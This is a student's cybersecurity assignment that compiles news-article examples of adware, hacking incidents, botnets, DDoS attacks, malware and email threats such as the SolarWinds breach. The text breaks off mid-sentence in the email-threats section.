Cyber and Information Security

HIMANSHU SHARMA
A1OO4819195
BCA-4-C
 ASSIGNMENT-2

Write 5 real life examples of each of the following term:

(*You may collect the information from different websites, magazines, white
paper, research paper etc.)

Ad-ware, Hacker, Bot & Botnet, DOS, DDOS, Malware, Dumpster Diving , E-
mail threats, Web threats, Hacking, White Hat Hacker, Cyber Terrorism,
Information warfare and surveillance, Virtual Crime, Online Frauds Identity Theft
and Intellectual property theft, Network threats-Worms, Virus, Spam’s, Spy ware,
Trojans, Backdoors, IP spoofing, ARP spoofing, Session hijacking, Sabotage,
phishing, Zombie/Zombie Drone, Gray Hat, Wardriving.
What Is Adware?

By definition, adware is any piece of software, malicious or not, that displays advertisements
on a computer. Most often, however, people use the word adware to refer to malicious
software that shows deceptive ads, flashing pop-up windows, large banners, and full-screen
auto-play commercials within their web browser. Its name is a compound of the
words advertising and software.
All adware is designed to generate revenue for its developer every time a user clicks on an
advert it shows. Some types of adware may obstruct your web-surfing experience by
redirecting you to malicious sites with adult content. There are also types that gather your
browsing data without permission and use it to serve you ads that are more relevant to your
tastes and that you will thus be more likely to click on.

Real life examples of Adware

1. Android Users Hit with ‘Undeletable’ Adware
Researchers say that 14.8 percent of Android users who were targeted with mobile malware
or adware last year were left with undeletable files.

UPDATE

A healthy percentage of Android users targeted by mobile malware or mobile adware last
year suffered a system partition infection, making the malicious files virtually undeletable.

That’s according to research from Kaspersky, which found that 14.8 percent of its users who
suffered such attacks were left with undeletable files. These range from trojans that can
install and run apps without the user’s knowledge, to less threatening, but nevertheless
intrusive, advertising apps.

Moreover, research found that most devices harbor pre-installed default applications that are
also undeletable – the number of those affected varies from 1 to 5 percent of users with low-
cost devices, and reaches 27 percent in extreme cases.

“Infection can happen via two paths: The threat gains root access on a device and installs
adware in the system partition, or the code for displaying ads gets into the firmware of the
device before it even ends up in the hands of the consumer,” according to the firm.

In the latter scenario, this could lead to potentially undesired and unplanned consequences.
For instance, many smartphones have functions providing remote access to the device. If
abused, such a feature could lead to a data compromise of a user’s device

2. Mobile adware: the silent plague with no origin

 According to Check Point Software, 27% of companies worldwide have suffered
attacks on their mobile devices, showing a clear upward trend of sixth generation
attacks

We are witnessing a plague of mobile adware, one of the most common forms of
cyber-threats designed to collect personal information from a user’s device.
Roughly 4 billion people1are connected to the internet via their smartphone, yet
companies rarely prioritize mobile security. Check Point’s  Cyber Security Report
2020 shows that in 2019, 27% of companies suffered a cyber-attack because the
security of a mobile device was breached.

“It only takes one compromised mobile device for cybercriminals to steal
confidential information and access an organizations corporate
network,” explains Yael Macias, Product Marketing Manager from Check
Point. “More and more mobile threats are created each day, with higher levels of
sophistication and larger success rates. Mobile adware, a form of malware
designed to display unwanted advertisements on a user’s screen, is utilized by
cybercriminals to execute sixth-generation cyber-attacks.”

The enemy is the adware’s point of origin

The main problem with adware is pinpointing how a phone became infected.
Adware is developed to sneak onto a device undetected without uninstallation
procedures. Removing this type of virus can be extremely difficult and the
information it collects, such as a devices operating system, location, images, etc.,
can be a high security risk.

Adware is commonly distributed through mobile apps. According to Statista, there

are 2.5 million apps available to Android and Google Play users and there are 1.8
million apps available on the Apple Store. These figures demonstrate the wide
scope of this kind of attack, giving a clear indication as to why cyber-criminals
focus on mobile devices.
One example of the power of the adware plague is Agent Smith, a new variant of
mobile malware detected last year by Check Point’s Researcher. Agent Smith
infected roughly 25 million mobile devices worldwide, without being noticed by
users. To do so, it imitated a Google application and exploited known
vulnerabilities in Android systems, automatically replacing installed applications
with versions containing malicious code, all without the user’s knowledge. It also
exploited the devices resources by displaying fraudulent ads which could generate
a profit by stealing bank credentials and eavesdropping.

3. Some Android adware apps hide icons to make it hard to

remove them

Uninstalling an Android app caught pushing adware is normally simple to deal

with – click and drag it to the top right of the screen and into the trash can.

App gone, ideally followed up with a public-spirited one-star rating on the Google
Play store to alert others to its bad behaviour.

But what happens if there’s no home screen or app tray icon?

New research by SophosLabs has discovered 15 apps on Google Play that install

without icons as part of a campaign to keep themselves on the user’s device.
The motivation is to keep pushing obtrusive ads for as long as possible. But for
some of the apps, the evasion doesn’t stop with disappearing icons.

For example, Flash On Calls & Messages (1 million installs since January 2019)
tries to convince users it never installed properly in the first place.

When first launched, users are greeted with the message “This app is incompatible
with your device!” The app then opens the Play store and navigates to the page for
Google Maps to distract users from the nature of this failure.
Others appear to install, complete with icons, before removing these some days
later. Another trick is to use two different names and icons depending on where it
is displayed. SophosLabs observed:

Nine out of the batch of 15 apps used deceptive application icons and names, most
of which appeared to have been chosen because they might plausibly resemble an
innocuous system app.
As is so often the case, there is no way to spot this kind of app just by looking at it
before installation.
The list of deceptive apps included QR code readers, image editors, backup
utilities, a phone finder, and one that claimed to clean the device of private data.

All detected by SophosLabs were from 2019, with anywhere from 1,000 to 1
million installations.

All were taken down after SophosLabs reported them to Google in July, which
should mean they were automatically de-installed soon after that (see SophosLabs
analysis for the full list).

4. Adware Posing as 85 Photography and Gaming Apps on

Google Play Installed Over 8 Million Times

The mobile platform is ubiquitous — enabling users to make online transactions,

run their everyday lives, or even use it in the workplace. It’s no surprise that
fraudsters and cybercriminals would want to cash in on it. Delivering adware, for
example, enables them to monetize affected devices while attempting to be
innocuous. And while they may be viewed as a nuisance at best, mobile ad fraud-
and adware-related incidents became so rampant last year that it cost businesses
hefty financial losses.

We found another example of adware’s potential real-life impact on Google Play.

Trend Micro detects this as AndroidOS_Hidenad.HRXH. It isn’t your run-of-the-
mill adware family: Apart from displaying advertisements that are difficult to
close, it employs unique techniques to evade detection through user behavior and
time-based triggers.

These adware-laden apps posed as 85 photography or gaming applications on

Google Play, where they have netted more than eight million in combined
downloads. We’ve disclosed our findings to Google, and the adware-embedded
apps are no longer on the Play store.

5. Crossrider Adware Still Causing Unwanted Mac Browser

Redirects

There exists a pervading urban legend that Apple Macs don’t get viruses. Time and
again this urban legend is proved to be as factual as all the conspiracy theories that
float about online combined. A new variant of the adware Crossrider again proves
the urban legend to be nothing more than an urban legend. While Macs may not
get viruses as they used to be defined (more on this later), they can be infected with
malware.
Crossrider was discovered infecting systems running Mac OS as early as 2013,
with new variants being detected frequently since then. In 2018, a variant was
detected and subsequently analyzed. On its face, the variant was nothing too out of
the ordinary when compared to its earlier cousins. Upon closer analysis, what did
differ was how the new variant achieved its persistence on an infected system.
Persistence is a goal shared by many a malware author—those with a focus on
cyber espionage see persistence on a targeted device as essential, while others see
it as a handy way to keep a thorn in the side of the victim. While some malware
authors and hackers are content to copy those who have gone before them, often
making detection easier, others are far more creative.
Upon analysis, it turned out that the variant discovered in 2018 would alter
configuration settings to remain on the infected system despite efforts to remove it.
By installing a configuration setting, the malware can perform actions on a Mac
that normal software—or, in this case, malware—would not be able to do. In the
case of the 2018 variant, this configuration profile forces both Safari and Chrome
to always open to a page on [Link]. To make matters worse, this setting
could not be changed via the browser’s settings. The configuration profile then
installs another identifier of [Link], which is not visible in
System Preferences.
What, then, separates the new variant discovered recently from the one discovered
in 2018? Honestly, very little. The difference between the newest and the slightly
older variant resides in to which domain the compromised configuration setting
directs victims—[Link], in the latest variant. The two variants even share
the same infection process.

What is Hacking?

Hacking is a general term for a variety of activities that seek to compromise computers and
networks. It refers to any unauthorized intrusion into a device, network, or server which
infringes on the privacy of their owners and users and/or aims to damage or otherwise
compromise computer-based properties like files, programs, and websites. While the term can
also refer to non-malicious activities, it is most often associated with malevolent attempts to
exploit system vulnerabilities for the benefit of the perpetrator.
The people who engage in hacking are commonly referred to as hackers. First used in a 1980
magazine article, this term was popularized a few years later by the movies “Tron” and
“WarGames”. Over the years, hackers have become a staple of popular culture. However, the
usual portrayal of hackers as self-taught, thrill-seeking programming geniuses is not only
stereotypical but also greatly exaggerated.
Although usually technical in nature, hacking doesn’t necessarily require excellent
computational skills. Hackers can also break into computers and systems using social
engineering, a set of psychological tactics designed to trick an unsuspecting target into giving
hackers access to their data. What’s more, while hacking does require at least some grasp of
computer technology, anyone can go to the dark web to purchase the tools they need to carry
out an attack or hire a professional hacker to do it for them.
In addition to fun and thrill, hackers can be motivated by numerous other factors. These
include financial gain, theft of personal data, access to confidential information, the desire to
take down websites, as well as idealism and political activism. While some forms of hacking
are completely legal, most of them are not and are considered criminal offenses. Depending
on the severity of their attack, hackers in the United States can serve anywhere from a few
weeks to 15 years in prison for computer tampering.

Real life examples of Hacking

1. Credit card skimmer piggybacks on Magento 1 hacking
spree

Back in the fall of 2020 threat actors started to massively exploit a vulnerability in
the no-longer maintained Magento 1 software branch. As a result, thousands of e-
commerce shops were compromised and many of them injected with credit card
skimming code.
While monitoring activities tied to this Magento 1 campaign, we identified an e-
commerce shop that had been targeted twice by skimmers. This in itself is not
unusual, multiple infections on the same site are common.
However this case was different. The threat actors devised a version of their script
that is aware of sites already injected with a Magento 1 skimmer. That second
skimmer will simply harvest credit card details from the already existing fake form
injected by the previous attackers.
In the incident we describe in this post, the threat actors also took into account that
an e-commerce site may get cleaned up from a Magento 1 hack. When that
happens, an alternate version of their skimmer injects its own fields that mimic a
legitimate payments platform.
Mass Magento 1 infections

The Magento 1 end-of-life coupled with a popular exploit turned out to be a huge

boon for threat actors. A large number of sites have been hacked indiscriminately
just because they were vulnerable.
RiskIQ attributed these incidents to Magecart Group 12, which has a long history
of web skimming using various techniques including supply-chain attacks.
This skimmer is rather lengthy and contains various levels of obfuscation that
make debugging it more challenging. Although there are variations, the format and
decoy payment form are very much the same.

2. Data on 3.2 million DriveSure clients exposed on hacking

forum

Hackers published data on 3.2 million users lifted from DriveSure data on the
Raidforums hacking forum late last month.

To prove the data’s quality, threat actor “pompompurin” detailed the leaked files
and user information information in a lengthy post, according to researchers
at Risk Based Security, who were the first to report the breach.

The long post was unusual in that hackers typically only share valuable segments
or trimmed down versions of user databases, the researchers wrote, but in this case,
numerous backend files and folders were leaked.

DriveSure, a service provider for car dealerships that focuses on employee training
programs and customer retention, maintains an abundance of client data. The
information exposed included names, addresses, phone numbers, email addresses,
IP addresses, car makes and models, VIN numbers, car service records and
dealership records, damage claims and 93,063 bcrypt hashed passwords. While
security pros consider bcrypt a strong encryption technique relative to older
methods such as MD5 and SHA1, it is still vulnerable to brute-force attacks
depending on the password strength.

The information leaked was prime for exploitation by other threat actors, especially
for insurance scams, the researchers said. Cybercriminals can use PII, damage
claims, extended car details and dealer and warranty information to target
insurance companies and policyholders as well as break into other valuable
platforms like bank accounts, personal email accounts and corporate systems.

The hackers dumped the data on December 19, 2020, Raidforums said, with the
researchers discovering the exposed DriveSure databases shortly after on Jan. 4.  

One leaked folder totaled 22 gigabytes and included the company’s MySQL
databases, exposing 91 sensitive databases. The databases range from detailed
dealership and inventory information, revenue data, reports, claims and client data.

A second compromised folder contained 11,474 files in 105 folders and totals 5.93
GB. Self-identified as “parser files,” they are most likely logs and back-ups of their
databases and contain the same information listed in the SQL databases, the
researcher said.

This was not the first time that “pompompurin” has exposed databases, said Ivan
Righi, cyber threat intelligence analyst at Digital Shadows. The threat actor has
leaked seven other databases in 2021, including those from People’s Energy
Company, Photolamus, Travel Oklahoma, MMG Fusion, Bourse des vols, Capital
Economics and Wemo Media.

“These breaches are not uncommon on Raidforums, and it bears resemblance to

other hacking groups such as ShinyHunters, which exposed close to one billion
user records in 2020,” Righi said. “As the data breaches are being offered for free,
it is likely that the user is attempting to build a reputation for themselves on the
criminal forum.”

3. Microsoft: How 'zero trust' can protect against sophisticated

hacking attacks

The variety of techniques used by the SolarWinds hackers was sophisticated yet in
many ways also ordinary and preventable, according to Microsoft. 

To prevent future attacks of similar levels of sophistication, Microsoft is

recommending organizations adopt a "zero trust mentality", which disavows the
assumption that everything inside an IT network is safe. That is, organizations
should assume breach and explicitly verify the security of user accounts, endpoint
devices, the network and other resources. 

As Microsoft's director of identity security, Alex Weinert, notes in a blogpost, the

three main attack vectors were compromised user accounts, compromised vendor
accounts, and compromised vendor software.  
SEE: Best VPNs • Best security keys • Best antivirus 
Thousands of companies were affected by the SolarWinds breach, disclosed in
mid-December. The hackers, known as UNC2452/Dark Halo, targeted the build
environment for SolarWinds' Orion software, tampering with the process when a
program is compiled from source code to a binary executable deployed by
customers. 

US security vendor Malwarebytes yesterday disclosed it was affected by the same

hackers but not via the tainted Orion updates. The hackers instead breached
Malwarebytes by exploiting applications with privileged access to Office 365 and
Azure infrastructure, giving the attackers "access to a limited subset" of
Malwarebytes' internal emails.
According to Weinert, the attackers exploited gaps in "explicit verification" in each
of the main attack vectors. 
"Where user accounts were compromised, known techniques like password spray,
phishing, or malware were used to compromise user credentials and gave the
attacker critical access to the customer network," Weinert writes.  
He argues cloud-based identity systems like Azure Active Directory (Azure AD)
are more secure than on-premises identity systems because the latter lack cloud-
powered protections like Azure AD's password protection to weed out weak
passwords, recent advances in password spray detection, and enhanced AI for
account compromise prevention.
In cases where the actor succeeded, Weinert notes that highly privileged vendor
accounts lacked additional protections such as multi-factor authentication (MFA),
IP range restrictions, device compliance, or access reviews. Microsoft has found
that 99.9% of the compromised accounts it tracks every month don't use MFA. 
MFA is an important control, as compromised high-privilege accounts could be
used to forge SAML tokens to access cloud resources. As the NSA noted in its
warning after the SolarWinds hack was disclosed: "if the malicious cyber actors
are unable to obtain a non-premises signing key, they would attempt to gain
sufficient administrative privileges within the cloud tenant to add a malicious
certificate trust relationship for forging SAML tokens."
This attack technique could be thwarted too if there were stricter permissions on
user accounts and devices. 

"Even in the worst case of SAML token forgery, excessive user permissions and
missing device and network policy restrictions allowed the attacks to progress,"
notes Weinert. 

"The first principle of Zero Trust is to verify explicitly – be sure you extend this
verification to all access requests, even those from vendors and especially those
from on-premises environments." 

SEE: Security Awareness and Training policy (TechRepublic Premium)

The Microsoft veteran finally offers a reminder why least privileged access is
critical to minimizing an attackers opportunities for moving laterally once inside a
network. This should help to compartmentalize attacks by restricting access to an
environment from a user, device, or network that's been compromised.

With Solorigate – the name Microsoft uses for the SolarWinds malware – the
attackers "took advantage of broad role assignments, permissions that exceeded
role requirements, and in some cases abandoned accounts and applications that
should have had no permissions at all," Weinert notes. 

Weinert admits the SolarWinds hack was a "truly significant and advanced attack"
but the techniques they used can be significantly reduced in risk or mitigated with
these best practices.
 4. A Chinese hacking group is stealing airline passenger details

A suspected Chinese hacking group has been attacking the airline

industry for the past few years with the goal of obtaining passenger
data in order to track the movement of persons of interest.

The intrusions have been linked to a threat actor that the cyber-
security has been tracking under the name of Chimera.
Also: Best VPNs • Best security keys • Best antivirus
Believed to be operating in the interests of the Chinese state, the
group's activities were first described in a report [PDF] and Black Hat
presentation [PDF] from CyCraft in 2020.
The initial report mentioned a series of coordinated attacks against the
Taiwanese superconductor industry.

But in a new report published last week by NCC Group and its

subsidiary Fox-IT, the two companies said the group's intrusions are
broader than initially thought, having also targeted the airline
industry.
"NCC Group and Fox-IT observed this threat actor during various
incident response engagements performed between October 2019
until April 2020," the two companies said.

These attacks targeted semiconductor and airline companies in

different geographical areas, and not just Asia, NCC and Fox-IT said.

In the case of some victims, the hackers stayed hidden inside

networks for up to three years before being discovered.

HACKERS SCRAPED USER DATA FROM THE RAM OF

FLIGHT BOOKING SERVERS
While the attacks orchestrated against the semiconductor industry
were aimed towards the theft of intellectual property (IP), the attacks
against the airline industry were focused instead on something else.

"The goal of targeting some victims appears to be to obtain Passenger

Name Records (PNR)," the two companies said.
"How this PNR data is obtained likely differs per victim, but we
observed the usage of several custom DLL files used to continuously
retrieve PNR data from memory of systems where such data is
typically processed, such as flight booking servers."

A TYPICAL CHIMERA ATTACK

The joint NCC and Fox-IT report also describes the Chimera group's
typical modus operandi, which usually begins with collecting user
login credentials that leaked in the public domain after data breaches
at other companies.

This data is used for credential stuffing or password spraying attacks

against a target's employee services, such as email accounts. Once in,
the Chimera operators search for login details for corporate systems,
such as Citrix systems and VPN appliances.
Once inside an internal network, the intruders usually deploy Cobalt
Strike, a penetration-testing framework used for "adversary
emulation," which they use to move laterally to as many systems as
possible, searching for IP and passenger details.

The two security firms said the hackers were patient and thorough and
would search until they found ways to traverse across segmented
networks to reach systems of interest.

Once they found and collected the data they were after; this
information was regularly uploaded to public cloud services like
OneDrive, Dropbox, or Google Drive, knowing that traffic to these
services wouldn't be inspected or blocked inside breached networks.

TRACKING TARGETS OF INTEREST

While the NCC and Fox-IT report didn't speculate why the hackers
targeted the airline industry and why they stole passenger data, this is
pretty obvious.

In fact, it is very common for state-sponsored hacking groups to target

airline companies, hotel chains, and telcos to obtain data they could
use to track the movements and communications of persons of
interest.

Past examples include Chinese group APT41, which targeted telcos

with special malware capable of stealing SMS messages. The attacks
were believed to be related to China's efforts to track its Uyghur
minority, with some of these efforts involving hacking telcos to track
Uyghur travelers' movements.
Another Chinese group that targeted telcos was APT10 (or Gallium),
whose activities were detailed in Cybereason's Operation Soft Cell
report.
In addition, Chinese state-sponsored hackers were also linked to the
Marriott hack, during which they stole troves of hotel reservation
details going back years.
But China isn't the only one engaging in these types of attacks.

Iranian group APT39 has also been linked to breaches

at telecommunication providers and travel companies for the purpose
of tracking Iranian dissidents, while another Iranian group, known as
Greenbug, has been linked to hacks against multiple telecom
providers across Southeast Asia.
Then there's Operation Specialist, a UK GCHQ operation that
targeted Belgian telco Belgacom between 2010 and 2013.

5. Google reveals sophisticated Windows and Android hacking

operation

Google published a six-part report today detailing a sophisticated hacking

operation that the company detected in early 2020 and which targeted owners of
both Android and Windows devices.
The attacks were carried out via two exploit servers delivering different exploit
chains via watering hole attacks, Google said.
Also: Best VPNs
"One server targeted Windows users, the other targeted Android," Project Zero,
one of Google's security teams, said in the first of six blog posts.
Google said that both exploit servers used Google Chrome vulnerabilities to gain
an initial foothold on victim devices. Once an initial entry point was established in
the user's browsers, attackers deployed an OS-level exploit to gain more control of
the victim's devices.

The exploit chains included a combination of both zero-day and n-day

vulnerabilities, where zero-day refers to bugs unknown to the software makers, and
n-day refers to bugs that have been patched but are still being exploited in the wild.

All in all, Google said the exploit servers contained:

 Four "renderer" bugs in Google Chrome, one of which was still a 0-day at
the time of its discovery.
 Two sandbox escape exploits abusing three 0-day vulnerabilities in the
Windows OS.
 And a "privilege escalation kit" composed of publicly known n-day exploits
for older versions of the Android OS.
The four zero-days, all of which were patched in the spring of 2020, were as
follows:

 CVE-2020-6418 - Chrome Vulnerability in TurboFan (fixed February 2020)

 CVE-2020-0938 - Font Vulnerability on Windows (fixed April 2020)
 CVE-2020-1020 - Font Vulnerability on Windows (fixed April 2020)
 CVE-2020-1027 - Windows CSRSS Vulnerability (fixed April 2020)
Google said that while they did not find any evidence of Android zero-day exploits
hosted on the exploit servers, its security researchers believe that the threat actor
most likely had access to Android zero-days as well, but most likely weren't
hosting them on the servers when its researchers discovered it.

GOOGLE: EXPLOIT CHAINS WERE COMPLEX AND WELL-

ENGINEERED
Overall, Google described the exploit chains as "designed for efficiency &
flexibility through their modularity."

"They are well-engineered, complex code with a variety of novel exploitation

methods, mature logging, sophisticated and calculated post-exploitation
techniques, and high volumes of anti-analysis and targeting checks," Google said.

"We believe that teams of experts have designed and developed these exploit
chains," but Google stopped short of providing any other details about the attackers
or the type of victims they targeted.

Together with its introductory blog post, Google has also published reports
detailing a Chrome "infinity bug" used in the attacks, the Chrome exploit chains,
the Android exploit chains, post-exploitation steps on Android devices, and
the Windows exploit chains.
The provided details should allow other security vendors to identify attacks on
their customers and track down victims and other similar attacks carried out by the
same threat actor.

Article title updated shortly after publication, changing the term "massive" to
"sophisticated" as there is no information on the scale of this operation to support
the initial wording.

What Is a Botnet?

A compound of the words robot and network, a botnet is a group of remote-controlled

computers coordinated together to perform malicious tasks. A single botnet can comprise
anywhere between a few hundred and a few million computers, commonly referred to as bots
(short for robots).
Botnets can gain access to your machine via a malicious software installation, a direct hacker
attack, or an automated program that monitors the internet in search of security deficiencies
(i.e. a lack of antivirus protection) to exploit. If your computer or any other internet-
connected device is infected with malware, it could be one of the bots that make up a botnet.
If that’s the case, all other computers and devices in your network are also at risk of
becoming part of the same botnet.
All computers in a botnet are remote-controlled by either a hacker or a piece of command-
and-control software they have developed. Also known as a “zombie army”, these computers
can be used by the botnet owner to send out spam emails, shut down websites, or generate
revenue by creating fake internet traffic or advertising paid downloads of fraudulent botnet
removal software.
As with many other technologies, botnets weren’t originally designed for malicious purposes.
In the early days of the world wide web, they were primarily used to host Internet Relay Chat
(IRC) networks. However, it didn’t take hackers too long to identify the main security
vulnerabilities of the original botnets and to start exploiting these insufficiencies for their
own gain.
Nowadays, botnets are a major cybersecurity threat that can take down large computer
networks in a matter of seconds and keep them down for hours, if not days. Hackers use
botnets mainly because the power of a “zombie army” hundreds of thousands strong allows
them to carry out much larger attacks than they otherwise could. In addition, hiding behind so
many computers makes it possible for them to disguise the actual source of the attack and
avoid getting caught and punished for their cybercrimes.

Real life examples of Botnet Attacks 

Powerful botnets were responsible for some of the largest, most devastating cyber attacks in
the last few years. The most notable examples include the following:
  The 2018 GitHub Attack – In February 2018, a large botnet carried out the largest
DDoS attack ever recorded. Generating peak incoming traffic of an unprecedented
1.35Tbps, the attack took GitHub, the largest software development platform on the
internet, offline for a few minutes.
 The 2014 Hong Kong Attack – The 2014 political unrest in Hong Kong provoked
the then-largest DDoS attack in history when at least a few large botnets joined forces
against pro-democracy websites in the country. Many have accused the Chinese
government of this attack, but the actual perpetrator remains unknown.
 The 2016 Mirai Attack – Named after a popular anime series, Mirai was a botnet
consisting of more than 100,000 computers. It made the news in 2016, when it
launched attacks against several cybersecurity companies, generating traffic volumes
of 1Tbps and taking down a large part of their online infrastructure.

What is a DDoS Attack?

A distributed denial-of-service (DDoS) attack is a malicious attempt to disrupt the

normal traffic of a targeted server, service or network by overwhelming the target
or its surrounding infrastructure with a flood of Internet traffic.
DDoS attacks achieve effectiveness by utilizing multiple compromised computer
systems as sources of attack traffic. Exploited machines can include computers and
other networked resources such as IoT devices.
From a high level, a DDoS attack is like an unexpected traffic jam clogging up the
highway, preventing regular traffic from arriving at its destination.

The Top-Five Most Famous DDoS Attacks

To give you insight into what these attacks are like “in the wild,” we’re going to take a look
at some of the most notable DDoS attacks to date. Our choices include some DDoS attacks
that are famous for their sheer scale while our others are because of their impact and
consequences.

1. The Google Attack, 2017

On October 16, 2020, Google’s Threat Analysis Group (TAG) posted a blog update
discussing how the threats and threat actors are changing their tactics due to the 2020 U.S.
election. At the end of the post, the company snuck in a note:
In 2017, our Security Reliability Engineering team measured a record-breaking UDP
amplification attack sourced out of several Chinese ISPs (ASNs 4134, 4837, 58453, and
9394), which remains the largest bandwidth attack of which we are aware.

Launched from three Chinese ISPs, the attack on thousands of Google’s IP addresses lasted
for six months and peaked at a breath-taking 2.5 Tbps. Damian Menscher, a Security
Reliability Engineer at Google, wrote:

The attacker used several networks to spoof 167 Mpps (millions of packets per second) to
180,000 exposed CLDAP, DNS, and SMTP servers, which would then send large responses
to us. This demonstrates the volumes a well-resourced attacker can achieve. This was
four times larger than the record-breaking 623 Gbps attack from the Mirai botnet a year
earlier.

2. The AWS DDoS Attack in 2020

Amazon Web Services, the 800-pound gorilla of everything cloud computing, was hit by a
gigantic DDoS attack in February 2020. This was the most extreme recent DDoS attack ever
and it targeted an unidentified AWS customer using a technique called Connectionless
Lightweight Directory Access Protocol (CLDAP) Reflection. This technique relies on
vulnerable third-party CLDAP servers and amplifies the amount of data sent to the victim’s
IP address by 56 to 70 times. The attack lasted for three days and peaked at an astounding 2.3
terabytes per second.

Why the AWS Attack Matters

While the disruption caused by the AWS DDoS Attack was far less severe than it could have
been, the sheer scale of the attack and the implications for AWS hosting customers
potentially losing revenue and suffering brand damage are significant.

3. The Mirai Krebs and OVH DDoS Attacks in 2016

On September 20, 2016, the blog of cybersecurity expert Brian Krebs was assaulted by a
DDoS attack in excess of 620 Gbps, which at the time, was the largest attack ever seen.
Krebs’ site had been attacked before. Krebs had recorded 269 DDoS attacks since July 2012,
but this attack was almost three times bigger than anything his site or, for that matter, the
internet had seen before.

The source of the attack was the Mirai botnet, which, at its peak later that year, consisted of
more than 600,000 compromised Internet of Things (IoT) devices such as IP cameras, home
routers, and video players. The Mirai botnet had been discovered in August that same year
but the attack on Krebs’ blog was its first big outing.

The next Mirai botnet attack on September 19 targeted one of the largest European hosting
providers, OVH, which hosts roughly 18 million applications for over one million clients.
This attack was on a single undisclosed OVH customer and driven by an estimated 145,000
bots, generating a traffic load of up to 1.1 terabits per second, and lasted about seven days.
But OVH was not to be the last Mirai botnet victim in 2016 … please see the next section.

4. The Mirai Dyn DDoS Attack in 2016

Before we discuss the third notable Mirai botnet DDoS attack of 2016, there’s one related
event that should be mentioned. On September 30, someone claiming to be the author of the
Mirai software released the source code on various hacker forums and the Mirai DDoS
platform has been replicated and mutated scores of times since.

On October 21, 2016, Dyn, a major Domain Name Service (DNS) provider, was assaulted by
a one terabit per second traffic flood that then became the new record for a DDoS attack.
There’s some evidence that the DDoS attack may have actually achieved a rate of 1.5 terabits
per second. The traffic tsunami knocked Dyn’s services offline rendering a number of high-
profile websites including GitHub, HBO, Twitter, Reddit, PayPal, Netflix, and Airbnb,
inaccessible. Kyle York, Dyn’s chief strategy officer, reported, “We observed 10s of millions
of discrete IP addresses associated with the Mirai botnet that were part of the attack.”

5. The Six Banks DDoS Attack in 2012

On March 12, 2012, six U.S. banks were targeted by a wave of DDoS attacks—Bank of
America, JPMorgan Chase, U.S. Bank, Citigroup, Wells Fargo, and PNC Bank. The attacks
were carried out by hundreds of hijacked servers from a botnet called Brobot with each attack
generating over 60 gigabits of DDoS attack traffic per second.

At the time, these attacks were unique in their persistence. Rather than trying to execute one
attack and then backing down, the perpetrators barraged their targets with a multitude of
attack methods in order to find one that worked. So, even if a bank was equipped to deal with
a few types of DDoS attacks, they were helpless against other types of attack.

Many cases of famous hacker attacks use malware at some point. For example, first, the
cybercriminal can send you a phishing email. No attachment. No links. Text only. After he
gains your trust, in a second moment, he can send you a malicious attachment, that is,
malware disguised as a legitimate file.

What is a Malware Attack?

A malware attack is a common cyberattack where malware (normally malicious

software) executes unauthorized actions on the victim’s system. The malicious
software (a.k.a. virus) encompasses many specific types of attacks such as
ransomware, spyware, command and control, and more.

Criminal organizations, state actors, and even well-known businesses have

been accused of (and, in some cases, caught) deploying malware. Like
other types of cyber attacks , some malware attacks end up with mainstream
news coverage due to their severe impact.
Top 5 real life example of malware attacks

1. CovidLock, ransomware, 2020

Fear in relation to the Coronavirus (COVID-19) has been widely exploited by cybercriminals.
CovidLock ransomware is an example. This type of ransomware infects victims via malicious
files promising to offer more information about the disease.

The problem is that, once installed, CovidLock encrypts data from Android devices and
denies data access to victims. To be granted access, you must pay a ransom of USD 100 per
device.

2. LockerGoga, ransomware, 2019

LockerGoga is a ransomware that hit the news in 2019 for infecting large corporations in the
world, such as Altran Technologies and Hydro. It’s estimated that it caused millions of
dollars in damage in advanced and targeted attacks.

LockerGoga infections involve malicious emails, phishing scams and also credentials theft.
LockerGoga is considered a very dangerous threat because it completely blocks victims'
access to the system.

3. Emotet, trojan, 2018

Emotet is a trojan that became famous in 2018 after the U.S. Department of Homeland
Security defined it as one of the most dangerous and destructive malware. The reason for so
much attention is that Emotet is widely used in cases of financial information theft, such as
bank logins and cryptocurrencies.

The main vectors for Emotet's spread are malicious emails in the form of spam and phishing
campaigns. 2 striking examples are the case of the Chilean bank Consorcio, with damages of
USD 2 million, and the case of the city of Allentown, Pennsylvania, with losses of USD 1
million.

4. WannaCry, ransomware, 2017

One of the worst ransomware attacks in history goes by the name of WannaCry, introduced
via phishing emails in 2017. The threat exploits a vulnerability in Windows.

It's estimated that more than 200,000 people have been reached worldwide by WannaCry,
including hospitals, universities and large companies, such as FedEx, Telefonica, Nissan and
Renault. The losses caused by WannaCry exceed USD 4 billion.

5. Petya, ransomware, 2016

Unlike most ransomware, Petya acts by blocking the machine's entire operating system. I
mean, Windows system. To release it, the victim has to pay a ransom.

It's estimated that the losses involving Petya and its more new and destructive variations
amount to USD 10 billion since it was released in 2016. Among the victims are banks,
airports and oil and shipping companies from different parts of the world.

Real life Examples of Email threats

1. SolarWinds CEO Confirms Office 365 Email
‘Compromise’ Played Role In Broad-Based Attack

SolarWinds CEO Sudhakar Ramakrishna verified Wednesday “suspicious activity”

in its Office 365 environment allowed hackers to gain access to and exploit the
SolarWinds Orion development environment.

Hackers most likely entered SolarWinds’s environment through compromised

credentials and/or a third-party application that capitalized on a zero-day
vulnerability, Ramakrishna said.

“We’ve confirmed that a SolarWinds email account was compromised and used to
programmatically access accounts of targeted SolarWinds personnel in business
and technical roles,” he said in the blog post. “By compromising credentials of
SolarWinds employees, the threat actors were able to gain access to and exploit our
Orion development environment.”

The beleaguered Austin, Texas-based IT infrastructure management vendor said a

SolarWinds email account was compromised and used to programmatically access
accounts of targeted SolarWinds personnel in business and technical roles.
By compromising the credentials of SolarWinds employees, Ramakrishna said the
hackers were able to gain access to and exploit the development environment for
the SolarWinds Orion network monitoring platform. SolarWinds was first notified
by Microsoft about a compromise related to its Office 365 environment on Dec.
13, the same day news of the hack went public.

SolarWinds’s investigation has not identified a specific vulnerability in Office 365

that would have allowed the hackers to enter the company’s environment through
Office 365, he said Wednesday. A day earlier, Ramakrishna told The Wall Street
Journal that one of several theories the company was pursuing is that the hackers
used an Office 365 account compromise as the initial point of entry into
SolarWinds.
Microsoft declined to comment to CRN. Ramakrishna said SolarWinds has
analyzed data from multiple systems and logs, including from our Office 365 and
Azure tenants, as part of its investigation. The SolarWinds hack is believed to be
the work of the Russian foreign intelligence service.

“While it’s widely understood any one company could not protect itself against a
sustained and unprecedented nation-state attack of this kind, we see an opportunity
to lead an industry-wide effort that makes SolarWinds a model for secure software
environments, development processes, and products,” Ramakrishna wrote in a blog
post Wednesday.

Some 30 percent of the private sector and government victims of the colossal
hacking campaign had no direct connection to SolarWinds, Brandon Wales, acting
